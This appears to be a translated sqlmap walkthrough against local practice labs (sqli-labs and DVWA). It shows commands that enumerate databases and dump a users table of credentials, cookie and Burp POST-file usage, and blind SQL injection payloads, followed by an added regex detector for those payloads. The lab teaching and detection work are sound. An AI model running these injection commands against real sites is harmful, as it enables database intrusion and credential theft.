F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:9999/Less-1/?id=1" --users -v 0
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.5
database management system users [4]:
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'c3acec58476d'
[*] 'root'@'localhost'
F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:9999/Less-1/?id=1" --dbs -v 0
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
available databases [5]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:9999/Less-1/?id=1" --tables -D "security"
---
[16:30:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[16:30:36] [INFO] fetching tables for database: 'security'
[16:30:36] [INFO] resumed: 'emails'
[16:30:36] [INFO] resumed: 'referers'
[16:30:36] [INFO] resumed: 'uagents'
[16:30:36] [INFO] resumed: 'users'
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+
F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:9999/Less-1/?id=1" --columns -D "security" -T "users"
---
[16:31:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.5
[16:31:38] [INFO] fetching columns for table 'users' in database 'security'
[16:31:38] [INFO] resumed: 'id','int(3)'
[16:31:38] [INFO] resumed: 'username','varchar(20)'
[16:31:38] [INFO] resumed: 'password','varchar(20)'
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:9999/Less-1/?id=1" --dump -D "security" -T "users"
---
[16:32:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[16:32:50] [INFO] fetching columns for table 'users' in database 'security'
[16:32:50] [INFO] resumed: 'id','int(3)'
[16:32:50] [INFO] resumed: 'username','varchar(20)'
[16:32:50] [INFO] resumed: 'password','varchar(20)'
[16:32:50] [INFO] fetching entries for table 'users' in database 'security'
[16:32:50] [INFO] resumed: '1','Dumb','Dumb'
[16:32:50] [INFO] resumed: '2','I-kill-you','Angelina'
[16:32:50] [INFO] resumed: '3','p@ssword','Dummy'
[16:32:50] [INFO] resumed: '4','crappy','secure'
[16:32:50] [INFO] resumed: '5','stupidity','stupid'
[16:32:50] [INFO] resumed: '6','genious','superman'
[16:32:50] [INFO] resumed: '7','mob!le','batman'
[16:32:50] [INFO] resumed: '8','admin','admin'
[16:32:50] [INFO] resumed: '9','admin1','admin1'
[16:32:50] [INFO] resumed: '10','admin2','admin2'
[16:32:50] [INFO] resumed: '11','admin3','admin3'
[16:32:50] [INFO] resumed: '12','dumbo','dhakkan'
[16:32:50] [INFO] resumed: '14','admin4','admin4'
Database: security
Table: users
[13 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
| 9  | admin1     | admin1   |
| 10 | admin2     | admin2   |
| 11 | admin3     | admin3   |
| 12 | dumbo      | dhakkan  |
| 14 | admin4     | admin4   |
+----+------------+----------+
F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:9999/Less-1/?id=1" -C username,password -D "security" -T "users" --dump
F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:9999/Less-1/?id=1" --dump-all -D "security" -T "users"
- --cookie specifies the cookie value, wrapped in single or double quotes
F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -u "http://192.168.25.86:8888/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=22791odtgjm7i2kadj6i5oqum3; security=low" --dbs -v 0
---
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
available databases [2]:
[*] dvwa
[*] information_schema
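- To test a POST request for injection points, capture the request with a tool such as Burp (BP) and save the HTTP request content to a txt file (in Burp, right-click, "Copy to file", and save it as a .txt file). -r specifies the file to test; sqlmap will then test the target using a POST request.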
F:\测试\安全测试\burp安全测试工具\sqlmap-master\sqlmap-master>python sqlmap.py -r "F:\测试\安全测试\burp安全测试工具\sqlmap-master\post2.txt" --dbs -v 0
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 2314=2314&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2 AND (SELECT 7364 FROM (SELECT(SLEEP(5)))TtCl)&Submit=Submit
---
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [2]:
[*] dvwa
[*] information_schema
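Seen from the defender's side, the two payloads sqlmap reports above have recognizable shapes: a numeric tautology after AND, and a SLEEP() call wrapped in a subquery. The following triage check over request parameters is an added example, not part of the original page or of sqlmap; the function names, rule names and sample strings are constructed for illustration, with the samples modelled on the payloads shown above.

```python
import re
from urllib.parse import parse_qsl

# Numeric tautology after a boolean operator, e.g. "AND 2314=2314".
# The backreference \1 requires both sides of '=' to be the same number.
TAUTOLOGY = re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)
# Time-delay functions used for time-based blind checks on MySQL/MariaDB.
DELAY = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)
# A parenthesised SELECT inside a parameter value (nested subquery).
SUBQUERY = re.compile(r"\(\s*SELECT\b", re.I)


def classify(value):
    """Return the set of rule names matched by one decoded parameter value."""
    hits = set()
    if TAUTOLOGY.search(value):
        hits.add("boolean-tautology")
    if DELAY.search(value):
        hits.add("time-delay")
    if SUBQUERY.search(value):
        hits.add("subquery")
    return hits


def scan(raw_params):
    """Scan a query string or urlencoded POST body; return {param: rules}."""
    findings = {}
    # parse_qsl splits on '&' and '=' first, then URL-decodes each part,
    # so encoded payloads (%20, %3D, +) are checked in decoded form.
    for name, value in parse_qsl(raw_params, keep_blank_values=True):
        hits = classify(value)
        if hits:
            findings[name] = hits
    return findings


# Constructed samples: the two POST bodies reported above, a URL-encoded
# variant of the first, and a benign request.
SAMPLES = [
    "id=2 AND 2314=2314&Submit=Submit",
    "id=2 AND (SELECT 7364 FROM (SELECT(SLEEP(5)))TtCl)&Submit=Submit",
    "id=2%20AND%202314%3D2314&Submit=Submit",
    "id=2&Submit=Submit",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", scan(sample) or "clean")
```

Pattern matching like this is useful for log triage and alerting only; the fix for the injectable id parameter is a parameterized query in the application.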